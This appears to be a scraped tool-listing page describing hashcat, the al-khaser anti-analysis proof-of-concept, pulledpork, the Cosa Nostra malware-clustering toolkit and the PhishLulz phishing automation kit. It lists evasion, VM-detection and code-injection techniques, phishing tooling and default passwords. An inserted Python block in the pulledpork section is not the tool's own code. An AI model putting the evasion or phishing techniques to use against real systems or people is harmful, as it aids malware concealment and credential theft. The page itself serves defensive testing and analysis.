Channel: KitPloit - PenTest Tools!

Hashcat v3.20 - World's Fastest and Most Advanced Password Recovery Utility


hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 160 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs and other hardware accelerators on Linux, Windows and OSX, and has facilities to help enable distributed password cracking.

Installation
Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

Usage/Help
Please refer to the Hashcat Wiki and the output of --help for usage information and general help. A list of frequently asked questions may also be found here. The Hashcat Forums also contain a plethora of information.

GPU Driver requirements:

  • AMD users on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
  • AMD users on Linux require "AMDGPU-Pro Driver" (16.40 or later)
  • Intel CPU users require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
  • Intel GPU on Windows users require "OpenCL Driver for Intel Iris and Intel HD Graphics"
  • Intel GPU on Linux users require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
  • NVidia users require "NVIDIA Driver" (367.x or later)

Features

  • World's fastest password cracker
  • World's first and only in-kernel rule engine
  • Free
  • Open-Source (MIT License)
  • Multi-OS (Linux, Windows and OSX)
  • Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
  • Multi-Hash (Cracking multiple hashes at the same time)
  • Multi-Devices (Utilizing multiple devices in same system)
  • Multi-Device-Types (Utilizing mixed device types in same system)
  • Supports distributed cracking networks (using overlay)
  • Supports interactive pause / resume
  • Supports sessions
  • Supports restore
  • Supports reading password candidates from file and stdin
  • Supports hex-salt and hex-charset
  • Supports automatic performance tuning
  • Supports automatic keyspace ordering markov-chains
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • 160+ Hash-types implemented with performance in mind
  • ... and much more

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • SipHash
  • RipeMD160
  • Whirlpool
  • DES (PT = $salt, key = $pass)
  • 3DES (PT = $salt, key = $pass)
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • Double MD5
  • Double SHA1
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5(sha1($pass))
  • md5($salt.md5($pass))
  • md5($salt.$pass.$salt)
  • md5(strtoupper(md5($pass)))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha1(CX)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF
  • vBulletin
  • IPB
  • Woltlab Burning Board
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • Mediawiki B type
  • Wordpress
  • Drupal
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • EPiServer
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • Cram MD5
  • MySQL Challenge-Response Authentication (SHA1)
  • PostgreSQL Challenge-Response Authentication (MD5)
  • SIP Digest Authentication (MD5)
  • WPA
  • WPA2
  • NetNTLMv1
  • NetNTLMv1 + ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Kerberos 5 TGS-REP etype 23
  • Netscape LDAP SHA/SSHA
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • OSX v10.4
  • OSX v10.5
  • OSX v10.6
  • OSX v10.7
  • OSX v10.8
  • OSX v10.9
  • OSX v10.10
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA
  • Cisco-PIX
  • Cisco-IOS
  • Cisco $8$
  • Cisco $9$
  • Juniper IVE
  • Juniper Netscreen/SSG (ScreenOS)
  • Android PIN
  • Windows 8+ phone PIN/Password
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • OpenCart
  • Citrix Netscaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • PeopleSoft PS_TOKEN
  • Skype
  • WinZip
  • 7-Zip
  • RAR3-hp
  • RAR5
  • AxCrypt
  • AxCrypt in memory SHA1
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • Lastpass
  • Password Safe v2
  • Password Safe v3
  • Keepass 1 (AES/Twofish) and Keepass 2 (AES)
  • Plaintext
  • eCryptfs
  • Android FDE <= 4.3
  • Android FDE (Samsung DEK)
  • TrueCrypt
  • VeraCrypt

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accepts rules

Supported OpenCL runtimes

  • AMD
  • Apple
  • Intel
  • Mesa (Gallium)
  • NVidia
  • pocl

Supported OpenCL device types

  • GPU
  • CPU
  • APU
  • DSP
  • FPGA
  • Coprocessor

Al-Khaser v0.65 - Public Malware Techniques Used In The Wild


al-khaser is a PoC malware with good intentions that aims to stress your anti-malware system. It performs a bunch of present-day malware tricks, and the goal is to see whether you stay under the radar.

Possible uses
  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.
Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks
  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environment Block (BeingDebugged)
  • Process Environment Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHandle (NtClose) Invalid Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread

Anti-Dumping
  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]
  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba - Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation
  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
  • Registry Keys artifacts
    • "HARDWARE\ACPI\DSDT\VBOX__"
    • "HARDWARE\ACPI\FADT\VBOX__"
    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "SOFTWARE\Oracle\VirtualBox Guest Additions"
    • "SYSTEM\ControlSet001\Services\VBoxGuest"
    • "SYSTEM\ControlSet001\Services\VBoxMouse"
    • "SYSTEM\ControlSet001\Services\VBoxService"
    • "SYSTEM\ControlSet001\Services\VBoxSF"
    • "SYSTEM\ControlSet001\Services\VBoxVideo"
    • SOFTWARE\VMware, Inc.\VMware Tools
    • SOFTWARE\Wine
  • File system artifacts
    • "system32\drivers\VBoxMouse.sys"
    • "system32\drivers\VBoxGuest.sys"
    • "system32\drivers\VBoxSF.sys"
    • "system32\drivers\VBoxVideo.sys"
    • "system32\vboxdisp.dll"
    • "system32\vboxhook.dll"
    • "system32\vboxmrxnp.dll"
    • "system32\vboxogl.dll"
    • "system32\vboxoglarrayspu.dll"
    • "system32\vboxoglcrutil.dll"
    • "system32\vboxoglerrorspu.dll"
    • "system32\vboxoglfeedbackspu.dll"
    • "system32\vboxoglpackspu.dll"
    • "system32\vboxoglpassthroughspu.dll"
    • "system32\vboxservice.exe"
    • "system32\vboxtray.exe"
    • "system32\VBoxControl.exe"
    • "system32\drivers\vmmouse.sys"
    • "system32\drivers\vmhgfs.sys"
  • Directories artifacts
    • "%PROGRAMFILES%\oracle\virtualbox guest additions\"
    • "%PROGRAMFILES%\VMWare\"
  • Memory artifacts
    • Interrupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • "\x08\x00\x27" (VBOX)
    • "\x00\x05\x69" (VMWARE)
    • "\x00\x0C\x29" (VMWARE)
    • "\x00\x1C\x14" (VMWARE)
    • "\x00\x50\x56" (VMWARE)
  • Virtual devices
    • "\\.\VBoxMiniRdrDN"
    • "\\.\VBoxGuest"
    • "\\.\pipe\VBoxMiniRdDN"
    • "\\.\VBoxTrayIPC"
    • "\\.\pipe\VBoxTrayIPC"
    • "\\.\HGFS"
    • "\\.\vmci"
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe (VMWARE)
    • vmwaretray.exe (VMWARE)
    • vmwareuser (VMWARE)
    • vmsrvc.exe (VirtualPC)
    • vmusrvc.exe (VirtualPC)
    • prl_cc.exe (Parallels)
    • prl_tools.exe (Parallels)
    • xenservice.exe (Citrix Xen)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (VMWARE)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
  • DLL Exports and Loaded DLLs
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)

Anti-Analysis
  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Code/DLL Injections techniques
  • CreateRemoteThread
  • SetWindowsHookEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)


pulledpork - Pulled Pork for Snort and Suricata Rule Management


PulledPork for Snort and Suricata rule management (from Google code)

Features and Capabilities
  • Automated downloading, parsing, state modification and rule modification for all of your snort rulesets.
  • Checksum verification for all major rule downloads
  • Automatic generation of updated sid-msg.map file
  • Capability to include your local.rules in sid-msg.map file
  • Capability to pull rules tarballs from custom urls
  • Complete Shared Object support
  • Complete IP Reputation List support
  • Capability to download multiple disparate rulesets at once
  • Maintains accurate changelog
  • Capability to HUP processes after rules download and process
  • Aids in tuning of rulesets
  • Verbose output so that you know EXACTLY what is happening
  • Minimal Perl Module dependencies
  • Support for Suricata, and ETOpen/ETPro rulesets
  • A sweet smokey flavor throughout the pork!

Command Usage Reference
Usage: ./pulledpork.pl [-dEgHklnRTPVvv? -help] -c <config filename> -o <rule output path>
-O <oinkcode> -s <so_rule output directory> -D <Distro> -S <SnortVer>
-p <path to your snort binary> -C <path to your snort.conf> -t <sostub output path>
-h <changelog path> -I (security|connectivity|balanced) -i <path to disablesid.conf>
-b <path to dropsid.conf> -e <path to enablesid.conf> -M <path to modifysid.conf>
-r <path to docs folder> -K <directory for separate rules files>

Options:

-help/? Print this help info.

-b Where the dropsid config file lives.

-C Path to your snort.conf

-c Where the pulledpork config file lives.

-d Do not verify signature of rules tarball, i.e. downloading from non VRT or ET locations.

-D What Distro are you running on, for the so_rules
Valid Distro Types:
Debian-6-0, Ubuntu-10-4, Ubuntu-12-04, Centos-5-4
FC-12, FC-14, RHEL-5-5, RHEL-6-0
FreeBSD-8-1, FreeBSD-9-0, FreeBSD-10-0, OpenBSD-5-2, OpenBSD-5-3
OpenSUSE-11-4, OpenSUSE-12-1, Slackware-13-1

-e Where the enablesid config file lives.

-E Write ONLY the enabled rules to the output files.

-g grabonly (download tarball rule file(s) and do NOT process)

-h path to the sid_changelog if you want to keep one?

-H Send a SIGHUP to the pids listed in the config file

-I Specify a base ruleset( -I security,connectivity,or balanced, see README.RULESET)

-i Where the disablesid config file lives.

-k Keep the rules in separate files (using same file names as found when reading)

-K Where (what directory) do you want me to put the separate rules files?

-l Log Important Info to Syslog (Errors, Successful run etc, all items logged as WARN or higher)

-L Where do you want me to read your local.rules for inclusion in sid-msg.map

-m where do you want me to put the sid-msg.map file?

-M where the modifysid config file lives.

-n Do everything other than download of new files (disablesid, etc)

-o Where do you want me to put generic rules file?

-p Path to your Snort binary

-P Process rules even if no new rules were downloaded

-R When processing enablesid, return the rules to their ORIGINAL state

-r Where do you want me to put the reference docs (xxxx.txt)

-S What version of snort are you using

-s Where do you want me to put the so_rules?

-T Process text based rules files only, i.e. DO NOT process so_rules

-u Where do you want me to pull the rules tarball from
** E.g., ET, Snort.org. See pulledpork config rule_url option for value ideas

-V Print Version and exit

-v Verbose mode, you know.. for troubleshooting and such nonsense.

-vv EXTRA Verbose mode, you know.. for in-depth troubleshooting and other such nonsense.

-w Skip the SSL verification (if there are issues pulling down rule files)

-W Where you want to work around the issue where some implementations of LWP do not work with pulledpork's proxy configuration.

Basic Usage Examples
A simple example of how to use PulledPork would be to specify all of your configuration directives inside of the PulledPork.conf file. For minimal function (i.e. NO Shared Object rule processing) you must define at a minimum the rule_file, oinkcode, temp_path, tar_path, and rule_path values. Below are some examples of this.
./pulledpork.pl -o /usr/local/etc/snort/rules/ -O 12345667778523452344234234  \
-u http://www.snort.org/reg-rules/snortrules-snapshot-2973.tar.gz -i disablesid.conf -T -H
The above will fetch the snortrules-snapshot-2973.tar.gz tarball from snort.org using the specified oinkcode of 12345667778523452344234234 and put the rules files from that tarball into the output path /usr/local/etc/snort/rules/. The -i option tells pulledpork where disablesid.conf lives, the -T option tells pulledpork not to process any shared object rules, and the final -H option tells pulledpork to send a Hangup signal to the snort pid that you defined in pulledpork.conf.
./pulledpork.pl -c pulledpork.conf -i disablesid.conf -T -H
Similar to the first example, but with all options specified in the pulledpork.conf file (other than disablesid and -H).
./pulledpork.pl -c pulledpork.conf -i disablesid.conf -m /usr/local/etc/snort/sid-msg.map -Hn
The above will simply read the disablesid and disable as defined, then send a Hangup signal after generating the sid-msg.map at the specified location without downloading anything. Highly useful when tuning / making changes etc..
Next example, snort inline with rules that we want to drop and disable, then HUP our daemons after creating a sid-msg.map and writing change info to sid_changes.log !
./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -m /usr/local/etc/snort/sid-msg.map \
-h /var/log/sid_changes.log -H
Next example, same as the previous but specifying that we want to run the default "security" based ruleset and that we want to enable rules specified in enablesid.conf .
./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -e enablesid.conf -m /usr/local/etc/snort/sid-msg.map \
-h /var/log/sid_changes.log -I security -H
Next example, same as the previous but specifying that we want to -K (Keep) the originating tarball names and write them to /usr/local/etc/snort/rules/
./pulledpork.pl -c pulledpork.conf -i disablesid.conf -b dropsid.conf -e enablesid.conf -m /usr/local/etc/snort/sid-msg.map \
-h /var/log/sid_changes.log -I security -H -K /usr/local/etc/snort/rules/
For users of Suricata, the same steps are necessary for where your installation files reside, but all that pulledpork needs to process rule files is the -S flag set to suricata-3.1.3, or whatever version of Suricata you are using:
./pulledpork.pl -c pulledpork.conf -S suricata-3.1.3

Special Notes Section
Please note that pulledpork runs rule modification (enable, drop, disable, modify) in that order by default..
1: enable
2: drop
3: disable
This means that disable rules will always take precedence.. thusly if you specify the same gid:sid in enable and disable configuration files, then that sid will be disabled.. keep this in mind for ranges also! However, you can specify a different order using the state_order keyword in the master config file.
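The precedence described above, modelled as an added example (not pulledpork's own code): rule state lists are applied in state_order, and each later step overwrites earlier ones, so a gid:sid present in both enablesid.conf and disablesid.conf ends up disabled under the default order. The sample rules, the 'gid:sid' / 'gid:sid-gid:sid' range syntax and the custom order passed to apply_state_order are assumptions for the demonstration.

```python
"""Model of pulledpork's enable -> drop -> disable precedence (added example)."""
from typing import Dict, Iterable, List, Tuple

RuleKey = Tuple[int, int]  # (gid, sid)

# Constructed sample rule set: fresh rules from a tarball start out enabled;
# 1:2003 is assumed to ship commented out, i.e. already disabled.
SAMPLE_RULES: Dict[RuleKey, str] = {
    (1, 2000): "enabled",
    (1, 2001): "enabled",
    (1, 2002): "enabled",
    (1, 2003): "disabled",
    (3, 19187): "enabled",
}

# pulledpork's default modification order; the page notes that
# state_order in the master config can change it.
DEFAULT_STATE_ORDER = ("enable", "drop", "disable")

# State a matching rule is set to by each step.
STEP_RESULT = {"enable": "enabled", "drop": "drop", "disable": "disabled"}


def parse_sid_spec(spec: str) -> List[RuleKey]:
    """Expand one line of a *sid.conf file into (gid, sid) pairs.

    Assumed syntax (not taken from the page): 'gid:sid' for one rule,
    'gid:sid-gid:sid' for an inclusive range within one gid; '#' starts
    a comment and blank lines yield nothing.
    """
    spec = spec.split("#", 1)[0].strip()
    if not spec:
        return []
    if "-" in spec:
        lo, hi = spec.split("-", 1)
        lo_gid, lo_sid = (int(x) for x in lo.split(":"))
        hi_gid, hi_sid = (int(x) for x in hi.split(":"))
        if lo_gid != hi_gid or hi_sid < lo_sid:
            raise ValueError("bad range: %s" % spec)
        return [(lo_gid, s) for s in range(lo_sid, hi_sid + 1)]
    gid, sid = (int(x) for x in spec.split(":"))
    return [(gid, sid)]


def load_sid_conf(lines: Iterable[str]) -> List[RuleKey]:
    """Parse a whole enablesid/dropsid/disablesid-style file."""
    keys: List[RuleKey] = []
    for line in lines:
        keys.extend(parse_sid_spec(line))
    return keys


def apply_state_order(rules: Dict[RuleKey, str],
                      confs: Dict[str, List[RuleKey]],
                      state_order=DEFAULT_STATE_ORDER) -> Dict[RuleKey, str]:
    """Apply the enable/drop/disable lists in state_order; later steps win."""
    result = dict(rules)
    for step in state_order:
        target = STEP_RESULT[step]
        for key in confs.get(step, []):
            if key in result:  # gid:sid not present in the ruleset is ignored
                result[key] = target
    return result


def demo():
    """1:2001 appears in both enablesid and disablesid (constructed case)."""
    confs = {
        "enable": load_sid_conf(["1:2003", "1:2001"]),
        "drop": load_sid_conf(["1:2000-1:2002"]),
        "disable": load_sid_conf(["1:2001  # also listed in enablesid"]),
    }
    default = apply_state_order(SAMPLE_RULES, confs)
    # Assumed custom state_order that makes enable run last.
    custom = apply_state_order(SAMPLE_RULES, confs, ("disable", "drop", "enable"))
    return default, custom


if __name__ == "__main__":
    default_states, custom_states = demo()
    for key in sorted(default_states):
        print("%d:%-6d default=%-8s custom=%s"
              % (key[0], key[1], default_states[key], custom_states[key]))
```

With the default order 1:2001 ends up disabled even though it was enabled and then dropped first; with enable run last it ends up enabled.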
I'll probably add more info later, the --help or --? will display all runtime options and the pulledpork.conf is pretty well annotated... so if you can't figure it out... try harder! And once you figure it out, please feel free to contribute with additional readme / help foo.. thx!
As a side note, I would like to give a shout-out to my buddy Bruce for aiding in the naming of PulledPork! "hopefully that will shut him up ;-)"
J

Cosa Nostra - A FOSS Graph Based Malware Clusterization Toolkit


Cosa Nostra is an open source software clustering toolkit with a focus on malware analysis. It can create phylogenetic trees of binary malware samples that are structurally similar. It was initially released during SyScan360 Shanghai (2016).

Getting started

Required 3rd party tools
In order to use Cosa Nostra you will need the source code, of course, Python 2.7, as well as one of the following tools in order to perform code analysis:
  • Pyew Written in Python, it supports analysis of PE, ELF, Bios and Boot files for x86 or x86_64.
  • IDA Written in C++. It supports analysing a plethora of executable types that you probably never even heard about. Commercial product.
  • Radare2 Written in pure C. Same as with IDA, with support for extremely rare CPUs and binary formats. Also, it's open source!

Analysing binaries
Once you have installed any of the previously mentioned tools you will need to use the appropriate batch tool to analyse the malware samples, as in the example below:
$ cd $COSA_NOSTRA_DIR
$ python r2_batch.py example.exe
Or
$ cd $COSA_NOSTRA_DIR
$ python pyew_batch.py example.exe
Or
$ cd $COSA_NOSTRA_DIR
$ /path/to/idaq -B -A -Sida_batch.py example.exe

Automating the Analysis of a Malware Dataset
The easiest way to analyse a malware dataset is by simply running a command like the following example:
$ find /your/malware/dataset/path -type f -exec python r2_batch.py {} ';'
It can be done in parallel by using the "GNU Parallel" tool, as in the following example:
$ find /your/malware/dataset/path -type f | parallel -j 8 python pyew_batch.py {}
In the example above, it will launch a total of 8 pyew_batch processes in parallel.

Database configuration
After the malware samples are analysed, if the analysis was successful, the call graph data for each sample will be stored, by default, in one SQLite database named "db.sqlite". You can configure the database name, path, database system, etc. by editing the file $COSA_NOSTRA_DIR/, as shown below:
$ cat config.cfg 
########################################################################
# Configuration for SQLite3
########################################################################
[database]
dbn=sqlite
# Database name
db=db.sqlite
If you prefer to use, say, a MySQL database system, you can configure it in config.cfg by putting the following configuration sections with the appropriate values for your setup:
########################################################################
# Example configuration for MySQL
########################################################################

[database]
dbn=mysql
# Database hostname or IP address
host=localhost
# Database name
db=db_name
# Database username
user=username
# Database password
pw=password

Clusterization of malware samples
This is the step that will take the most time. Once you have analysed all the malware samples from your datasets and the call graph signatures, corresponding prime numbers, etc. are calculated and stored in the database, the next step is to find clusters. The tool for doing so is called "cn_clusterer.py". It uses the same database configuration file ($COSA_NOSTRA_DIR/config.cfg) in order to extract the call graph signatures for the analysed samples. Running it is as simple as the following:
$ cd $COSA_NOSTRA_DIR
$ ./cn_clusterer.py
(...)
Calculating difference matrix for 2357, iteration 5540280 out of 7507600 (4858784 matches, 600144 cache misses)
Calculating difference matrix for 2354, iteration 5543020 out of 7507600 (4861293 matches, 600373 cache misses)
Calculating difference matrix for 471, iteration 5545760 out of 7507600 (4863903 matches, 600373 cache misses)
(...)
Making tree for group with 59 sample(s), iteration 0 out of 256
Making tree for group with 393 sample(s), iteration 1 out of 256
Making tree for group with 1347 sample(s), iteration 2 out of 256
(...)
[Wed Nov 2 13:37:12 2016 2830:140561185462080] Creating unnamed cluster...
[Wed Nov 2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Trojan.Skylock-4'...
[Wed Nov 2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Downloader.133181-1'...
[Wed Nov 2 13:37:12 2016 2830:140561185462080] Creating cluster with name u'Win.Trojan.Agent-1213378'...
[Wed Nov 2 13:37:13 2016 2830:140561185462080] Done processing phylogenetic trees!
[Wed Nov 2 13:37:13 2016 2830:140561185462080] Done
When the process finishes, clusters grouping the analysed malware samples will be created in the specified database.

Watching clusters: the web GUI
The last step is to launch the web.py based Web application and log in:
$ cd $COSA_NOSTRA_DIR
$ python cosa_nostra.py [optional port to listen to]
http://0.0.0.0:YOURPORT/
Then, open a browser and navigate to the address printed out by cosa_nostra.py. A login form will be displayed asking for a username and password. By default, it's "admin/cosanostra". You can change it in the file $COSA_NOSTRA_DIR/config.py:
$ cat config.py
#!/usr/bin/env python

#-----------------------------------------------------------------------
# Configuration for Cosa Nostra
#-----------------------------------------------------------------------
DEBUG=False
CN_USER="admin"
# SHA1 hash of the password "cosanostra", change to the SHA1 hash of
# whatever password you prefer.
CN_PASS="048920dedfe36c112d74dc8108abb4db5185a918"
(...)
Once you're logged in you can select from the left panel one the following options:
  • Samples: See the samples in the current database.
  • Clusters: See the list of clusters that Cosa Nostra found for the given datasets.
In the "Clusters" view, one can select different clusters and view a hierarchical graph of the discovered malware family.

Screenshots

  • A small cluster of Trojan.Backspace-1 (name by ClamAV)
  • A small cluster of MiniDukes
  • A cluster of Kazy/Bifroses
  • A small part of a really big cluster of FannyWorms


PhishLulz - Ruby toolset aimed at automating Phishing activities


PhishLulz is a Ruby toolset aimed at automating Phishing activities.
When you start a phishing campaign, a dedicated Amazon EC2 (Debian 7) instance is spawned. The VM comes with various open source tools that have been glued together. The two main components are:

PhishLulz comes with its own self-signed CA: this is needed to generate self-signed certs for the PhishingFrenzy admin UI. You will also find a bunch of cool phishing templates (which are not in PF) that you can quickly re-use in your scenarios.
Automatic domain registration is still TODO, however you can play with the almost-working code for the NameCheap registrar.

PhishLulz AWS AMI

The public AMI id is: ami-141bb974. You want to clone that, add your SSH keys, and use your new clone.
The following are default passwords for various services, change them.
  • MySQL root user: phishlulz_mysql
  • PhishingFrenzy admin user: phishlulz_frenzy
  • BeEF beef user: phishlulz_beef
To change the default admin user password/email for PhishingFrenzy use the Rails console:
cd /var/www/phishing-frenzy && RAILS_ENV=production rails console
admin = Admin.first
admin.password = "newpasswd"
admin.email = "newemail"
admin.save!
exit

PhishLulz Toolset
  • phish_lulz: main script to start/stop phishing instances
  • tools/find_resources: multi-threaded subdomain discovery and fingerprinting tool
  • tools/mailboxbug: multi-threaded webmail data extruder
  • tools/mail_parser: simple script to extract html/txt from an .eml email file
  • namecheap_wrapper: WIP for automated domain registration

PhishLulz material released at KiwiCon X


Requirements
  • Amazon AWS account (see main config.yaml)
  • Non-Winzozz OS (path separators are hardcoded on purpose so as not to make it compatible with Winzozz)
  • ssh, scp, openssl in PATH
  • Sane Ruby environment (RVM suggested). Install the required gems with: gem install sinatra thin watir-webdriver headless colorize datamapper dm-sqlite-adapter dm-timestamps dm-migrations fog nokogiri mail net-ssh --no-rdoc --no-ri
  • Gecko/Chrome drivers
To instrument Firefox you need to have the geckodriver binary in your PATH. Download it from https://github.com/mozilla/geckodriver/releases. The same applies if you prefer instrumenting Chrome: you need the chromedriver.
Once you have the binary, make sure it's in the PATH: export PATH=$PATH:path_to_driver_dir

